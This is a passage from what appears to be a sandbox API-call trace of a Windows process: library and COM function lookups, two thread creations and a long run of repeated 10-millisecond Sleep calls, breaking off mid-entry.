(lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffa14340000 [0105.557] GetProcAddress (hModule=0x7ffa14340000, lpProcName="CoCreateInstance") returned 0x7ffa143dfb70 [0105.557] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffa14340000 [0105.558] GetProcAddress (hModule=0x7ffa14340000, lpProcName="CoUninitialize") returned 0x7ffa143a1540 [0105.558] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x3d23ca4, lpParameter=0x540000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c08 [0105.559] CloseHandle (hObject=0x1c08) returned 1 [0105.559] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x3d23d80, lpParameter=0x540000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c08 [0105.562] CloseHandle (hObject=0x1c08) returned 1 [0105.562] Sleep (dwMilliseconds=0xa) [0105.622] Sleep (dwMilliseconds=0xa) [0105.671] Sleep (dwMilliseconds=0xa) [0105.717] Sleep (dwMilliseconds=0xa) [0105.752] Sleep (dwMilliseconds=0xa) [0105.779] Sleep (dwMilliseconds=0xa) [0105.794] Sleep (dwMilliseconds=0xa) [0105.810] Sleep (dwMilliseconds=0xa) [0105.825] Sleep (dwMilliseconds=0xa) [0105.841] Sleep (dwMilliseconds=0xa) [0105.859] Sleep (dwMilliseconds=0xa) [0105.904] Sleep (dwMilliseconds=0xa) [0105.951] Sleep (dwMilliseconds=0xa) [0105.999] Sleep (dwMilliseconds=0xa) [0106.029] Sleep (dwMilliseconds=0xa) [0106.045] Sleep (dwMilliseconds=0xa) [0106.060] Sleep (dwMilliseconds=0xa) [0106.076] Sleep (dwMilliseconds=0xa) [0106.093] Sleep (dwMilliseconds=0xa) [0106.107] Sleep (dwMilliseconds=0xa) [0106.123] Sleep (dwMilliseconds=0xa) [0106.138] Sleep (dwMilliseconds=0xa) [0106.185] Sleep (dwMilliseconds=0xa) [0106.235] Sleep (dwMilliseconds=0xa) [0106.274] Sleep (dwMilliseconds=0xa) [0106.294] Sleep (dwMilliseconds=0xa) [0106.312] Sleep (dwMilliseconds=0xa) [0106.328] Sleep (dwMilliseconds=0xa) [0106.342] Sleep (dwMilliseconds=0xa) [0106.356] Sleep (dwMilliseconds=0xa) [0106.372] Sleep (dwMilliseconds=0xa) [0106.389] Sleep (dwMilliseconds=0xa) [0106.452] Sleep (dwMilliseconds=0xa) [0106.473] Sleep (dwMilliseconds=0xa) [0106.497] Sleep (dwMilliseconds=0xa) [0106.512] Sleep (dwMilliseconds=0xa) [0106.528] Sleep (dwMilliseconds=0xa) [0106.544] Sleep (dwMilliseconds=0xa) [0106.561] Sleep (dwMilliseconds=0xa) [0106.622] Sleep (dwMilliseconds=0xa) [0106.646] Sleep (dwMilliseconds=0xa) [0106.670] Sleep (dwMilliseconds=0xa) [0106.684] Sleep (dwMilliseconds=0xa) [0106.700] Sleep (dwMilliseconds=0xa) [0106.721] Sleep (dwMilliseconds=0xa) [0106.794] Sleep (dwMilliseconds=0xa) [0106.818] Sleep (dwMilliseconds=0xa) [0106.841] Sleep (dwMilliseconds=0xa) [0106.858] Sleep (dwMilliseconds=0xa) [0106.872] Sleep (dwMilliseconds=0xa) [0106.889] Sleep (dwMilliseconds=0xa) [0106.903] Sleep (dwMilliseconds=0xa) [0106.967] Sleep (dwMilliseconds=0xa) [0107.003] Sleep (dwMilliseconds=0xa) [0107.029] Sleep (dwMilliseconds=0xa) [0107.045] Sleep (dwMilliseconds=0xa) [0107.059] Sleep (dwMilliseconds=0xa) [0107.076] Sleep (dwMilliseconds=0xa) [0107.090] Sleep (dwMilliseconds=0xa) [0107.153] Sleep (dwMilliseconds=0xa) [0107.196] Sleep (dwMilliseconds=0xa) [0107.216] Sleep (dwMilliseconds=0xa) [0107.232] Sleep (dwMilliseconds=0xa) [0107.248] Sleep (dwMilliseconds=0xa) [0107.263] Sleep (dwMilliseconds=0xa) [0107.278] Sleep (dwMilliseconds=0xa) [0107.341] Sleep (dwMilliseconds=0xa) [0107.406] Sleep (dwMilliseconds=0xa) [0107.471] Sleep (dwMilliseconds=0xa) [0107.499] Sleep (dwMilliseconds=0xa) [0107.537] Sleep (dwMilliseconds=0xa) [0107.624] Sleep (dwMilliseconds=0xa) [0107.665] Sleep (dwMilliseconds=0xa) [0107.725] Sleep (dwMilliseconds=0xa) [0107.747] Sleep (dwMilliseconds=0xa) [0107.762] Sleep (dwMilliseconds=0xa) [0107.810] Sleep (dwMilliseconds=0xa) [0107.846] Sleep (dwMilliseconds=0xa) [0107.872] Sleep (dwMilliseconds=0xa) [0107.888] Sleep (dwMilliseconds=0xa) [0107.904] Sleep (dwMilliseconds=0xa) [0107.919] Sleep (dwMilliseconds=0xa) [0107.936] Sleep (dwMilliseconds=0xa) [0107.951] Sleep (dwMilliseconds=0xa) [0107.998] Sleep (dwMilliseconds=0xa) [0108.020] Sleep (dwMilliseconds=0xa) [0108.044] Sleep (dwMilliseconds=0xa) [0108.060] Sleep (dwMilliseconds=0xa) [0108.076] Sleep (dwMilliseconds=0xa) [0108.091] Sleep (dwMilliseconds=0xa) [0108.108] Sleep (dwMilliseconds=0xa) [0108.174] Sleep (dwMilliseconds=0xa) [0108.212] Sleep (dwMilliseconds=0xa) [0108.232] Sleep (dwMilliseconds=0xa) [0108.247] Sleep (dwMilliseconds=0xa) [0108.265] Sleep (dwMilliseconds=0xa) [0108.279] Sleep (dwMilliseconds=0xa) [0108.294] Sleep (dwMilliseconds=0xa) [0108.312] Sleep (dwMilliseconds=0xa) [0108.327] Sleep (dwMilliseconds=0xa) [0108.382] Sleep (dwMilliseconds=0xa) [0108.449] Sleep (dwMilliseconds=0xa) [0108.466] Sleep (dwMilliseconds=0xa) [0108.481] Sleep (dwMilliseconds=0xa) [0108.497] Sleep (dwMilliseconds=0xa) [0108.517] Sleep (dwMilliseconds=0xa) [0108.528] Sleep (dwMilliseconds=0xa) [0108.543] Sleep (dwMilliseconds=0xa) [0108.562] Sleep (dwMilliseconds=0xa) [0108.608] Sleep (dwMilliseconds=0xa) [0108.640] Sleep (dwMilliseconds=0xa) [0108.653] Sleep (dwMilliseconds=0xa) [0108.668] Sleep (dwMilliseconds=0xa) [0108.684] Sleep (dwMilliseconds=0xa) [0108.700] Sleep (dwMilliseconds=0xa) [0108.716] Sleep (dwMilliseconds=0xa) [0108.731] Sleep (dwMilliseconds=0xa) [0108.747] Sleep (dwMilliseconds=0xa) [0108.793] Sleep (dwMilliseconds=0xa) [0108.818] Sleep (dwMilliseconds=0xa) [0108.840] Sleep (dwMilliseconds=0xa) [0108.856] Sleep (dwMilliseconds=0xa) [0108.872] Sleep (dwMilliseconds=0xa) [0108.892] Sleep (dwMilliseconds=0xa) [0108.903] Sleep (dwMilliseconds=0xa) [0108.954] Sleep (dwMilliseconds=0xa) [0108.993] Sleep (dwMilliseconds=0xa) [0109.012] Sleep (dwMilliseconds=0xa) [0109.029] Sleep (dwMilliseconds=0xa) [0109.075] Sleep (dwMilliseconds=0xa) [0109.090] Sleep (dwMilliseconds=0xa) [0109.114] Sleep (dwMilliseconds=0xa) [0109.154] Sleep (dwMilliseconds=0xa) [0109.183] Sleep (dwMilliseconds=0xa) [0109.200] Sleep (dwMilliseconds=0xa) [0109.218] Sleep (dwMilliseconds=0xa) [0109.231] Sleep (dwMilliseconds=0xa) [0109.247] Sleep (dwMilliseconds=0xa) [0109.263] Sleep (dwMilliseconds=0xa) [0109.280] Sleep (dwMilliseconds=0xa) [0109.293] Sleep (dwMilliseconds=0xa) [0109.328] Sleep (dwMilliseconds=0xa) [0109.367] Sleep (dwMilliseconds=0xa) [0109.388] Sleep (dwMilliseconds=0xa) [0109.403] Sleep (dwMilliseconds=0xa) [0109.456] Sleep (dwMilliseconds=0xa) [0109.516] Sleep (dwMilliseconds=0xa) [0109.548] Sleep (dwMilliseconds=0xa) [0109.559] Sleep (dwMilliseconds=0xa) [0109.575] Sleep (dwMilliseconds=0xa) [0109.591] Sleep (dwMilliseconds=0xa) [0109.606] Sleep (dwMilliseconds=0xa) [0109.622] Sleep (dwMilliseconds=0xa) [0109.637] Sleep (dwMilliseconds=0xa) [0109.688] Sleep (dwMilliseconds=0xa) [0109.722] Sleep (dwMilliseconds=0xa) [0109.768] Sleep (dwMilliseconds=0xa) [0109.805] Sleep (dwMilliseconds=0xa) [0109.864] Sleep (dwMilliseconds=0xa) [0109.900] Sleep (dwMilliseconds=0xa) [0109.925] Sleep (dwMilliseconds=0xa) [0109.950] Sleep (dwMilliseconds=0xa) [0109.966] Sleep (dwMilliseconds=0xa) [0109.981] Sleep (dwMilliseconds=0xa) [0109.998] Sleep (dwMilliseconds=0xa) [0110.014] Sleep (dwMilliseconds=0xa) [0110.064] Sleep (dwMilliseconds=0xa) [0110.099] Sleep (dwMilliseconds=0xa) [0110.130] Sleep (dwMilliseconds=0xa) [0110.153] Sleep (dwMilliseconds=0xa) [0110.168] Sleep (dwMilliseconds=0xa) [0110.184] Sleep (dwMilliseconds=0xa) [0110.201] Sleep (dwMilliseconds=0xa) [0110.215] Sleep (dwMilliseconds=0xa) [0110.250] Sleep (dwMilliseconds=0xa) [0110.285] Sleep (dwMilliseconds=0xa) [0110.382] Sleep (dwMilliseconds=0xa) [0110.476] Sleep (dwMilliseconds=0xa) [0110.511] Sleep (dwMilliseconds=0xa) [0110.528] Sleep (dwMilliseconds=0xa) [0110.544] Sleep (dwMilliseconds=0xa) [0110.560] Sleep (dwMilliseconds=0xa) [0110.575] Sleep (dwMilliseconds=0xa) [0110.587] Sleep (dwMilliseconds=0xa) [0110.598] Sleep (dwMilliseconds=0xa) [0110.609] Sleep (dwMilliseconds=0xa) [0110.650] Sleep (dwMilliseconds=0xa) [0110.684] Sleep (dwMilliseconds=0xa) [0110.699] Sleep (dwMilliseconds=0xa) [0110.714] Sleep (dwMilliseconds=0xa) [0110.730] Sleep (dwMilliseconds=0xa) [0110.746] Sleep (dwMilliseconds=0xa) [0110.757] Sleep (dwMilliseconds=0xa) [0110.783] Sleep (dwMilliseconds=0xa) [0110.798] Sleep (dwMilliseconds=0xa) [0110.832] Sleep (dwMilliseconds=0xa) [0110.869] Sleep (dwMilliseconds=0xa) [0110.902] Sleep (dwMilliseconds=0xa) [0110.923] Sleep (dwMilliseconds=0xa) [0110.939] Sleep (dwMilliseconds=0xa) [0110.955] Sleep (dwMilliseconds=0xa) [0110.973] Sleep (dwMilliseconds=0xa) [0110.986] Sleep (dwMilliseconds=0xa) [0111.002] Sleep (dwMilliseconds=0xa) [0111.017] Sleep (dwMilliseconds=0xa) [0111.053] Sleep (dwMilliseconds=0xa) [0111.093] Sleep (dwMilliseconds=0xa) [0111.111] Sleep (dwMilliseconds=0xa) [0111.127] Sleep (dwMilliseconds=0xa) [0111.142] Sleep (dwMilliseconds=0xa) [0111.158] Sleep (dwMilliseconds=0xa) [0111.174] Sleep (dwMilliseconds=0xa) [0111.190] Sleep (dwMilliseconds=0xa) [0111.205] Sleep (dwMilliseconds=0xa) [0111.241] Sleep (dwMilliseconds=0xa) [0111.277] Sleep (dwMilliseconds=0xa) [0111.299] Sleep (dwMilliseconds=0xa) [0111.314] Sleep (dwMilliseconds=0xa) [0111.330] Sleep (dwMilliseconds=0xa) [0111.346] Sleep (dwMilliseconds=0xa) [0111.361] Sleep (dwMilliseconds=0xa) [0111.387] Sleep (dwMilliseconds=0xa) [0111.415] Sleep (dwMilliseconds=0xa) [0111.495] Sleep (dwMilliseconds=0xa) [0111.532] Sleep (dwMilliseconds=0xa) [0111.557] Sleep (dwMilliseconds=0xa) [0111.582] Sleep (dwMilliseconds=0xa) [0111.597] Sleep (dwMilliseconds=0xa) [0111.612] Sleep (dwMilliseconds=0xa) [0111.627] Sleep (dwMilliseconds=0xa) [0111.642] Sleep (dwMilliseconds=0xa) [0111.658] Sleep (dwMilliseconds=0xa) [0111.696] Sleep (dwMilliseconds=0xa) [0111.733] Sleep (dwMilliseconds=0xa) [0111.752] Sleep (dwMilliseconds=0xa) [0111.767] Sleep (dwMilliseconds=0xa) [0111.783] Sleep (dwMilliseconds=0xa) [0111.800] Sleep (dwMilliseconds=0xa) [0111.814] Sleep (dwMilliseconds=0xa) [0111.830] Sleep (dwMilliseconds=0xa) [0111.845] Sleep (dwMilliseconds=0xa) [0111.881] Sleep (dwMilliseconds=0xa) [0111.923] Sleep (dwMilliseconds=0xa) [0111.939] Sleep (dwMilliseconds=0xa) [0111.955] Sleep (dwMilliseconds=0xa) [0111.970] Sleep (dwMilliseconds=0xa) [0111.987] Sleep (dwMilliseconds=0xa) [0112.002] Sleep (dwMilliseconds=0xa) [0112.018] Sleep (dwMilliseconds=0xa) [0112.066] Sleep (dwMilliseconds=0xa) [0112.103] Sleep (dwMilliseconds=0xa) [0112.141] Sleep (dwMilliseconds=0xa) [0112.161] Sleep (dwMilliseconds=0xa) [0112.173] Sleep (dwMilliseconds=0xa) [0112.189] Sleep (dwMilliseconds=0xa) [0112.206] Sleep (dwMilliseconds=0xa) [0112.220] Sleep (dwMilliseconds=0xa) [0112.236] Sleep (dwMilliseconds=0xa) [0112.271] Sleep (dwMilliseconds=0xa) [0112.306] Sleep (dwMilliseconds=0xa) [0112.330] Sleep (dwMilliseconds=0xa) [0112.345] Sleep (dwMilliseconds=0xa) [0112.361] Sleep (dwMilliseconds=0xa) [0112.385] Sleep (dwMilliseconds=0xa) [0112.460] Sleep (dwMilliseconds=0xa) [0112.496] Sleep (dwMilliseconds=0xa) [0112.517] Sleep (dwMilliseconds=0xa) [0112.533] Sleep (dwMilliseconds=0xa) [0112.549] Sleep (dwMilliseconds=0xa) [0112.565] Sleep (dwMilliseconds=0xa) [0112.580] Sleep (dwMilliseconds=0xa) [0112.595] Sleep (dwMilliseconds=0xa) [0112.611] Sleep (dwMilliseconds=0xa) [0112.644] Sleep (dwMilliseconds=0xa) [0112.679] Sleep (dwMilliseconds=0xa) [0112.705] Sleep (dwMilliseconds=0xa) [0112.721] Sleep (dwMilliseconds=0xa) [0112.737] Sleep (dwMilliseconds=0xa) [0112.753] Sleep (dwMilliseconds=0xa) [0112.768] Sleep (dwMilliseconds=0xa) [0112.830] Sleep (dwMilliseconds=0xa) [0112.859] Sleep (dwMilliseconds=0xa) [0112.877] Sleep (dwMilliseconds=0xa) [0112.892] Sleep (dwMilliseconds=0xa) [0112.908] Sleep (dwMilliseconds=0xa) [0112.923] Sleep (dwMilliseconds=0xa) [0112.939] Sleep (dwMilliseconds=0xa) [0112.955] Sleep (dwMilliseconds=0xa) [0112.971] Sleep (dwMilliseconds=0xa) [0113.017] Sleep (dwMilliseconds=0xa) [0113.049] Sleep (dwMilliseconds=0xa) [0113.064] Sleep (dwMilliseconds=0xa) [0113.081] Sleep (dwMilliseconds=0xa) [0113.095] Sleep (dwMilliseconds=0xa) [0113.111] Sleep (dwMilliseconds=0xa) [0113.126] Sleep (dwMilliseconds=0xa) [0113.142] Sleep (dwMilliseconds=0xa) [0113.158] Sleep (dwMilliseconds=0xa) [0113.205] Sleep (dwMilliseconds=0xa) [0113.235] Sleep (dwMilliseconds=0xa) [0113.252] Sleep (dwMilliseconds=0xa) [0113.267] Sleep (dwMilliseconds=0xa) [0113.289] Sleep (dwMilliseconds=0xa) [0113.315] Sleep (dwMilliseconds=0xa) [0113.408] Sleep (dwMilliseconds=0xa) [0113.455] Sleep (dwMilliseconds=0xa) [0113.487] Sleep (dwMilliseconds=0xa) [0113.503] Sleep (dwMilliseconds=0xa) [0113.517] Sleep (dwMilliseconds=0xa) [0113.533] Sleep (dwMilliseconds=0xa) [0113.548] Sleep (dwMilliseconds=0xa) [0113.564] Sleep (dwMilliseconds=0xa) [0113.612] Sleep (dwMilliseconds=0xa) [0113.636] Sleep (dwMilliseconds=0xa) [0113.658] Sleep (dwMilliseconds=0xa) [0113.673] Sleep (dwMilliseconds=0xa) [0113.689] Sleep (dwMilliseconds=0xa) [0113.705] Sleep (dwMilliseconds=0xa) [0113.721] Sleep (dwMilliseconds=0xa) [0113.738] Sleep (dwMilliseconds=0xa) [0113.752] Sleep (dwMilliseconds=0xa) [0113.798] Sleep (dwMilliseconds=0xa) [0113.839] Sleep (dwMilliseconds=0xa) [0113.861] Sleep (dwMilliseconds=0xa) [0113.877] Sleep (dwMilliseconds=0xa) [0113.892] Sleep (dwMilliseconds=0xa) [0113.908] Sleep (dwMilliseconds=0xa) [0113.923] Sleep (dwMilliseconds=0xa) [0113.940] Sleep (dwMilliseconds=0xa) [0113.955] Sleep (dwMilliseconds=0xa) [0114.002] Sleep (dwMilliseconds=0xa) [0114.030] Sleep (dwMilliseconds=0xa) [0114.050] Sleep (dwMilliseconds=0xa) [0114.064] Sleep (dwMilliseconds=0xa) [0114.080] Sleep (dwMilliseconds=0xa) [0114.095] Sleep (dwMilliseconds=0xa) [0114.111] Sleep (dwMilliseconds=0xa) [0114.126] Sleep (dwMilliseconds=0xa) [0114.142] Sleep (dwMilliseconds=0xa) [0114.189] Sleep (dwMilliseconds=0xa) [0114.214] Sleep (dwMilliseconds=0xa) [0114.301] Sleep (dwMilliseconds=0xa) [0114.314] Sleep (dwMilliseconds=0xa) [0114.385] Sleep (dwMilliseconds=0xa) [0114.420] Sleep (dwMilliseconds=0xa) [0114.439] Sleep (dwMilliseconds=0xa) [0114.455] Sleep (dwMilliseconds=0xa) [0114.470] Sleep (dwMilliseconds=0xa) [0114.486] Sleep (dwMilliseconds=0xa) [0114.502] Sleep (dwMilliseconds=0xa) [0114.517] Sleep (dwMilliseconds=0xa) [0114.533] Sleep (dwMilliseconds=0xa) [0114.596] Sleep (dwMilliseconds=0xa) [0114.628] Sleep (dwMilliseconds=0xa) [0114.642] Sleep (dwMilliseconds=0xa) [0114.658] Sleep (dwMilliseconds=0xa) [0114.674] Sleep (dwMilliseconds=0xa) [0114.689] Sleep (dwMilliseconds=0xa) [0114.705] Sleep (dwMilliseconds=0xa) [0114.783] Sleep (dwMilliseconds=0xa) [0114.828] Sleep (dwMilliseconds=0xa) [0114.851] Sleep (dwMilliseconds=0xa) [0114.863] Sleep (dwMilliseconds=0xa) [0114.881] Sleep (dwMilliseconds=0xa) [0114.894] Sleep (dwMilliseconds=0xa) [0114.911] Sleep (dwMilliseconds=0xa) [0114.925] Sleep (dwMilliseconds=0xa) [0114.941] Sleep (dwMilliseconds=0xa) [0114.988] Sleep (dwMilliseconds=0xa) [0115.099] Sleep (dwMilliseconds=0xa) [0115.132] Sleep (dwMilliseconds=0xa) [0115.149] Sleep (dwMilliseconds=0xa) [0115.160] Sleep (dwMilliseconds=0xa) [0115.180] Sleep (dwMilliseconds=0xa) [0115.191] Sleep (dwMilliseconds=0xa) [0115.211] Sleep (dwMilliseconds=0xa) [0115.225] Sleep (dwMilliseconds=0xa) [0115.239] Sleep (dwMilliseconds=0xa) [0115.288] Sleep (dwMilliseconds=0xa) [0115.322] Sleep (dwMilliseconds=0xa) [0115.348] Sleep (dwMilliseconds=0xa) [0115.363] Sleep (dwMilliseconds=0xa) [0115.389] Sleep (dwMilliseconds=0xa) [0115.410] Sleep (dwMilliseconds=0xa) [0115.473] Sleep (dwMilliseconds=0xa) [0115.522] Sleep (dwMilliseconds=0xa) [0115.535] Sleep (dwMilliseconds=0xa) [0115.575] Sleep (dwMilliseconds=0xa) [0115.599] Sleep (dwMilliseconds=0xa) [0115.613] Sleep (dwMilliseconds=0xa) [0115.630] Sleep (dwMilliseconds=0xa) [0115.645] Sleep (dwMilliseconds=0xa) [0115.692] Sleep (dwMilliseconds=0xa) [0115.715] Sleep (dwMilliseconds=0xa) [0115.738] Sleep (dwMilliseconds=0xa) [0115.754] Sleep (dwMilliseconds=0xa) [0115.769] Sleep (dwMilliseconds=0xa) [0115.785] Sleep (dwMilliseconds=0xa) [0115.801] Sleep (dwMilliseconds=0xa) [0115.864] Sleep (dwMilliseconds=0xa) [0115.889] Sleep (dwMilliseconds=0xa) [0115.934] Sleep (dwMilliseconds=0xa) [0115.957] Sleep (dwMilliseconds=0xa) [0115.988] Sleep (dwMilliseconds=0xa) [0116.004] Sleep (dwMilliseconds=0xa) [0116.052] Sleep (dwMilliseconds=0xa) [0116.075] Sleep (dwMilliseconds=0xa) [0116.097] Sleep (dwMilliseconds=0xa) [0116.113] Sleep (dwMilliseconds=0xa) [0116.129] Sleep (dwMilliseconds=0xa) [0116.145] Sleep (dwMilliseconds=0xa) [0116.161] Sleep (dwMilliseconds=0xa) [0116.223] Sleep (dwMilliseconds=0xa) [0116.317] Sleep (dwMilliseconds=0xa) [0116.332] Sleep (dwMilliseconds=0xa) [0116.350] Sleep (dwMilliseconds=0xa) [0116.364] Sleep (dwMilliseconds=0xa) [0116.389] Sleep (dwMilliseconds=0xa) [0116.414] Sleep (dwMilliseconds=0xa) [0116.444] Sleep (dwMilliseconds=0xa) [0116.490] Sleep (dwMilliseconds=0xa) [0116.546] Sleep (dwMilliseconds=0xa) [0116.590] Sleep (dwMilliseconds=0xa) [0116.613] Sleep (dwMilliseconds=0xa) [0116.629] Sleep (dwMilliseconds=0xa) [0116.645] Sleep (dwMilliseconds=0xa) [0116.660] Sleep (dwMilliseconds=0xa) [0116.707] Sleep (dwMilliseconds=0xa) [0116.732] Sleep (dwMilliseconds=0xa) [0116.754] Sleep (dwMilliseconds=0xa) [0116.770] Sleep (dwMilliseconds=0xa) [0116.813] Sleep (dwMilliseconds=0xa) [0116.885] Sleep (dwMilliseconds=0xa) [0116.927] Sleep (dwMilliseconds=0xa) [0116.959] Sleep (dwMilliseconds=0xa) [0116.973] Sleep (dwMilliseconds=0xa) [0116.989] Sleep (dwMilliseconds=0xa) [0117.004] Sleep (dwMilliseconds=0xa) [0117.019] Sleep (dwMilliseconds=0xa) [0117.036] Sleep (dwMilliseconds=0xa) [0117.051] Sleep (dwMilliseconds=0xa) [0117.067] Sleep (dwMilliseconds=0xa) [0117.113] Sleep (dwMilliseconds=0xa) [0117.157] Sleep (dwMilliseconds=0xa) [0117.176] Sleep (dwMilliseconds=0xa) [0117.191] Sleep (dwMilliseconds=0xa) [0117.207] Sleep (dwMilliseconds=0xa) [0117.222] Sleep (dwMilliseconds=0xa) [0117.238] Sleep (dwMilliseconds=0xa) [0117.255] Sleep (dwMilliseconds=0xa) [0117.317] Sleep (dwMilliseconds=0xa) [0117.364] Sleep (dwMilliseconds=0xa) [0117.392] Sleep (dwMilliseconds=0xa) [0117.410] Sleep (dwMilliseconds=0xa) [0117.426] Sleep (dwMilliseconds=0xa) [0117.441] Sleep (dwMilliseconds=0xa) [0117.457] Sleep (dwMilliseconds=0xa) [0117.474] Sleep (dwMilliseconds=0xa) [0117.520] Sleep (dwMilliseconds=0xa) [0117.561] Sleep (dwMilliseconds=0xa) [0117.584] Sleep (dwMilliseconds=0xa) [0117.598] Sleep (dwMilliseconds=0xa) [0117.633] Sleep (dwMilliseconds=0xa) [0117.644] Sleep (dwMilliseconds=0xa) [0117.660] Sleep (dwMilliseconds=0xa) [0117.676] Sleep (dwMilliseconds=0xa) [0117.723] Sleep (dwMilliseconds=0xa) [0117.765] Sleep (dwMilliseconds=0xa) [0117.785] Sleep (dwMilliseconds=0xa) [0117.801] Sleep (dwMilliseconds=0xa) [0117.817] Sleep (dwMilliseconds=0xa) [0117.837] Sleep (dwMilliseconds=0xa) [0117.847] Sleep (dwMilliseconds=0xa) [0117.863] Sleep (dwMilliseconds=0xa) [0117.880] Sleep (dwMilliseconds=0xa) [0117.926] Sleep (dwMilliseconds=0xa) [0117.950] Sleep (dwMilliseconds=0xa) [0117.972] Sleep (dwMilliseconds=0xa) [0117.988] Sleep (dwMilliseconds=0xa) [0118.004] Sleep (dwMilliseconds=0xa) [0118.019] Sleep (dwMilliseconds=0xa) [0118.035] Sleep (dwMilliseconds=0xa) [0118.098] Sleep (dwMilliseconds=0xa) [0118.125] Sleep (dwMilliseconds=0xa) [0118.145] Sleep (dwMilliseconds=0xa) [0118.164] Sleep (dwMilliseconds=0xa) [0118.176] Sleep (dwMilliseconds=0xa) [0118.191] Sleep (dwMilliseconds=0xa) [0118.207] Sleep (dwMilliseconds=0xa) [0118.222] Sleep (dwMilliseconds=0xa) [0118.285] Sleep (dwMilliseconds=0xa) [0118.309] Sleep (dwMilliseconds=0xa) [0118.333] Sleep (dwMilliseconds=0xa) [0118.348] Sleep (dwMilliseconds=0xa) [0118.363] Sleep (dwMilliseconds=0xa) [0118.385] Sleep (dwMilliseconds=0xa) [0118.458] Sleep (dwMilliseconds=0xa) [0118.479] Sleep (dwMilliseconds=0xa) [0118.504] Sleep (dwMilliseconds=0xa) [0118.520] Sleep (dwMilliseconds=0xa) [0118.535] Sleep (dwMilliseconds=0xa) [0118.552] Sleep (dwMilliseconds=0xa) [0118.567] Sleep (dwMilliseconds=0xa) [0118.645] Sleep (dwMilliseconds=0xa) [0118.676] Sleep (dwMilliseconds=0xa) [0118.691] Sleep (dwMilliseconds=0xa) [0118.707] Sleep (dwMilliseconds=0xa) [0118.723] Sleep (dwMilliseconds=0xa) [0118.738] Sleep (dwMilliseconds=0xa) [0118.754] Sleep (dwMilliseconds=0xa) [0118.770] Sleep (dwMilliseconds=0xa) [0118.785] Sleep (dwMilliseconds=0xa) [0118.832] Sleep (dwMilliseconds=0xa) [0118.853] Sleep (dwMilliseconds=0xa) [0118.864] Sleep (dwMilliseconds=0xa) [0118.879] Sleep (dwMilliseconds=0xa) [0118.895] Sleep (dwMilliseconds=0xa) [0118.910] Sleep (dwMilliseconds=0xa) [0118.926] Sleep (dwMilliseconds=0xa) [0118.949] Sleep (dwMilliseconds=0xa) [0119.007] Sleep (dwMilliseconds=0xa) [0119.040] Sleep (dwMilliseconds=0xa) [0119.052] Sleep (dwMilliseconds=0xa) [0119.066] Sleep (dwMilliseconds=0xa) [0119.082] Sleep (dwMilliseconds=0xa) [0119.098] Sleep (dwMilliseconds=0xa) [0119.113] Sleep (dwMilliseconds=0xa) [0119.129] Sleep (dwMilliseconds=0xa) [0119.192] Sleep (dwMilliseconds=0xa) [0119.219] Sleep (dwMilliseconds=0xa) [0119.238] Sleep (dwMilliseconds=0xa) [0119.254] Sleep (dwMilliseconds=0xa) [0119.273] Sleep (dwMilliseconds=0xa) [0119.285] Sleep (dwMilliseconds=0xa) [0119.301] Sleep (dwMilliseconds=0xa) [0119.316] Sleep (dwMilliseconds=0xa) [0119.333] Sleep (dwMilliseconds=0xa) [0119.385] Sleep (dwMilliseconds=0xa) [0119.410] Sleep (dwMilliseconds=0xa) [0119.426] Sleep (dwMilliseconds=0xa) [0119.441] Sleep (dwMilliseconds=0xa) [0119.457] Sleep (dwMilliseconds=0xa) [0119.473] Sleep (dwMilliseconds=0xa) [0119.488] Sleep (dwMilliseconds=0xa) [0119.504] Sleep (dwMilliseconds=0xa) [0119.520] Sleep (dwMilliseconds=0xa) [0119.566] Sleep (dwMilliseconds=0xa) [0119.590] Sleep (dwMilliseconds=0xa) [0119.613] Sleep (dwMilliseconds=0xa) [0119.664] Sleep (dwMilliseconds=0xa) [0119.676] Sleep (dwMilliseconds=0xa) [0119.691] Sleep (dwMilliseconds=0xa) [0119.738] Sleep (dwMilliseconds=0xa) [0119.780] Sleep (dwMilliseconds=0xa) [0119.801] Sleep (dwMilliseconds=0xa) [0119.817] Sleep (dwMilliseconds=0xa) [0119.828] Sleep (dwMilliseconds=0xa) [0119.838] Sleep (dwMilliseconds=0xa) [0119.849] Sleep (dwMilliseconds=0xa) [0119.868] Sleep (dwMilliseconds=0xa) [0119.885] Sleep (dwMilliseconds=0xa) [0119.931] Sleep (dwMilliseconds=0xa) [0119.995] Sleep (dwMilliseconds=0xa) [0120.009] Sleep (dwMilliseconds=0xa) [0120.025] Sleep (dwMilliseconds=0xa) [0120.040] Sleep (dwMilliseconds=0xa) [0120.056] Sleep (dwMilliseconds=0xa) [0120.072] Sleep (dwMilliseconds=0xa) [0120.088] Sleep (dwMilliseconds=0xa) [0120.152] Sleep (dwMilliseconds=0xa) [0120.184] Sleep (dwMilliseconds=0xa) [0120.196] Sleep (dwMilliseconds=0xa) [0120.214] Sleep (dwMilliseconds=0xa) [0120.228] Sleep (dwMilliseconds=0xa) [0120.244] Sleep (dwMilliseconds=0xa) [0120.260] Sleep (dwMilliseconds=0xa) [0120.275] Sleep (dwMilliseconds=0xa) [0120.291] Sleep (dwMilliseconds=0xa) [0120.338] Sleep (dwMilliseconds=0xa) [0120.367] Sleep (dwMilliseconds=0xa) [0120.392] Sleep (dwMilliseconds=0xa) [0120.418] Sleep (dwMilliseconds=0xa) [0120.433] Sleep (dwMilliseconds=0xa) [0120.447] Sleep (dwMilliseconds=0xa) [0120.462] Sleep (dwMilliseconds=0xa) [0120.478] Sleep (dwMilliseconds=0xa) [0120.525] Sleep (dwMilliseconds=0xa) [0120.556] Sleep (dwMilliseconds=0xa) [0120.572] Sleep (dwMilliseconds=0xa) [0120.587] Sleep (dwMilliseconds=0xa) [0120.603] Sleep (dwMilliseconds=0xa) [0120.614] Sleep (dwMilliseconds=0xa) [0120.625] Sleep (dwMilliseconds=0xa) [0120.651] Sleep (dwMilliseconds=0xa) [0120.680] Sleep (dwMilliseconds=0xa) [0120.713] Sleep (dwMilliseconds=0xa) [0120.753] Sleep (dwMilliseconds=0xa) [0120.764] Sleep (dwMilliseconds=0xa) [0120.775] Sleep (dwMilliseconds=0xa) [0120.798] Sleep (dwMilliseconds=0xa) [0120.815] Sleep (dwMilliseconds=0xa) [0120.829] Sleep (dwMilliseconds=0xa) [0120.845] Sleep (dwMilliseconds=0xa) [0120.860] Sleep (dwMilliseconds=0xa) [0120.907] Sleep 